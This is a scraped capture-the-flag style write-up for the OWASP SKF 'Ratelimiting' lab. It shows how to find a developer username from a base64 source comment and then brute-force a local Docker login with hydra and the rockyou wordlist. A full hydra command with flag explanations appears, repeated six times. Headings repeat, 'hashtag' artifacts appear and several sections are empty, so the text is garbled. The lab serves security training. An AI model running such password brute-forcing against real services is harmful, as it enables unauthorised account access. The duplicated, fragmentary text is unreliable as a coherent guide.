1 of 4

Ratelimiting (Brute-force login)

Python - Ratelimiting

Running the app on Docker

Now that the app is running let's go hacking!

NodeJS - Ratelimiting

Running the app on Docker

Now that the app is running let's go hacking!

Reconnaissance

The application shows a admin login form, but we don't have the credentials, we'll have to somehow login inorder to solve the challenge, the name of the challenge is 'Ratelimiting', from that we know that we need to bruteforce login, but what would be the username?

Let's do more investigation, upon viewing the source code, there is a base64 message commented out there.

We are going to decrypt the base64 encoded string using terminal as shown in the below image.

Exploitation

From this, it seems that the developer has an account with username devteam, so we probably need to bruteforce into that =) Client, rockyou? Are we referring to the rockyou wordlist?

Rockyou Wordlist -

So we'll have to bruteforce the login form which is post based using some tool, I prefer hydra & burp suite's intruder to do this, in this writeup, i'll demonstrate this using hydra.

Bruteforcing using Hydra

After you launch a bruteforce attack against the login function, after several minutes, you'll get the password like the below screenshot.

Additional sources

Please refer to the OWASP's guide for protecting against such type of bruteforce attacks which happens because ratelimiting is not set.

Java - Ratelimiting

Running the app on Docker

Now that the app is running let's go hacking!

NodeJS - Ratelimiting

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:js-ratelimiting

$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:js-ratelimiting

Now that the app is running let's go hacking!

Reconnaissance

Let's do more investigation, upon viewing the source code, there is a base64 message commented out there.

We are going to decrypt the base64 encoded string using terminal as shown in the below image.

Exploitation

From this, it seems that the developer has an account with username devteam, so we probably need to bruteforce into that =) Client, rockyou? Are we referring to the rockyou wordlist?

Rockyou Wordlist -

So we'll have to bruteforce the login form which is post based using some tool, I prefer hydra & burp suite's intruder to do this, in this writeup, i'll demonstrate this using hydra.

Bruteforcing using Hydra

After you launch a bruteforce attack against the login function, after several minutes, you'll get the password like the below screenshot.

Additional sources

Please refer to the OWASP's guide for protecting against such type of bruteforce attacks which happens because ratelimiting is not set.

hydra -l devteam -P Desktop/pentest/rockyou.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"

let's make this clear since it might be confusing for newbies or those who have never used hydra before.

-l denotes username here.
-P denotes the location of the wordlist with the passwords
0.0.0.0 is the host address
-s denotes the target port.
http-post-form is used to specify that this is a http-post-form.
 "/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
 F=Invalid <-- This parameter is used to filter out invalid logins.

hydra -l devteam -P Desktop/pentest/rockyou.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"

let's make this clear since it might be confusing for newbies or those who have never used hydra before.

-l denotes username here.
-P denotes the location of the wordlist with the passwords
0.0.0.0 is the host address
-s denotes the target port.
http-post-form is used to specify that this is a http-post-form.
 "/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
 F=Invalid <-- This parameter is used to filter out invalid logins.

hydra -l devteam -P Desktop/pentest/rockyou.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"

let's make this clear since it might be confusing for newbies or those who have never used hydra before.

-l denotes username here.
-P denotes the location of the wordlist with the passwords
0.0.0.0 is the host address
-s denotes the target port.
http-post-form is used to specify that this is a http-post-form.
 "/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
 F=Invalid <-- This parameter is used to filter out invalid logins.

hydra -l devteam -P Desktop/pentest/rockyou.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"

let's make this clear since it might be confusing for newbies or those who have never used hydra before.

-l denotes username here.
-P denotes the location of the wordlist with the passwords
0.0.0.0 is the host address
-s denotes the target port.
http-post-form is used to specify that this is a http-post-form.
 "/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
 F=Invalid <-- This parameter is used to filter out invalid logins.

hydra -l devteam -P Desktop/pentest/rockyou.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"

let's make this clear since it might be confusing for newbies or those who have never used hydra before.

-l denotes username here.
-P denotes the location of the wordlist with the passwords
0.0.0.0 is the host address
-s denotes the target port.
http-post-form is used to specify that this is a http-post-form.
 "/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
 F=Invalid <-- This parameter is used to filter out invalid logins.

hydra -l devteam -P Desktop/pentest/rockyou.txt 0.0.0.0 -s 5000 http-post-form "/:username=^USER^&password=^PASS^:F=Invalid"

let's make this clear since it might be confusing for newbies or those who have never used hydra before.

-l denotes username here.
-P denotes the location of the wordlist with the passwords
0.0.0.0 is the host address
-s denotes the target port.
http-post-form is used to specify that this is a http-post-form.
 "/:username=^USER^&password=^PASS^ <-- These are the post parameters which are being bruteforced.
 F=Invalid <-- This parameter is used to filter out invalid logins.

Ratelimiting (Brute-force login)

Python - Ratelimiting

hashtagRunning the app on Docker

NodeJS - Ratelimiting

hashtagRunning the app on Docker

hashtagReconnaissance

hashtagExploitation

hashtagAdditional sources

Java - Ratelimiting

hashtagRunning the app on Docker

NodeJS - Ratelimiting

hashtagRunning the app on Docker

hashtagReconnaissance

hashtagExploitation

hashtagAdditional sources

Python - Ratelimiting

hashtagRunning the app on Docker

hashtagExploitation

hashtagAdditional sources

Java - Ratelimiting

hashtagRunning the app on Docker

hashtagExploitation

hashtagAdditional sources

Ratelimiting (Brute-force login)

Running the app on Docker

Running the app on Docker

Reconnaissance

Exploitation

Additional sources

Running the app on Docker

Running the app on Docker

Reconnaissance

Exploitation

Additional sources

Running the app on Docker

Exploitation

Additional sources

Running the app on Docker

Exploitation

Additional sources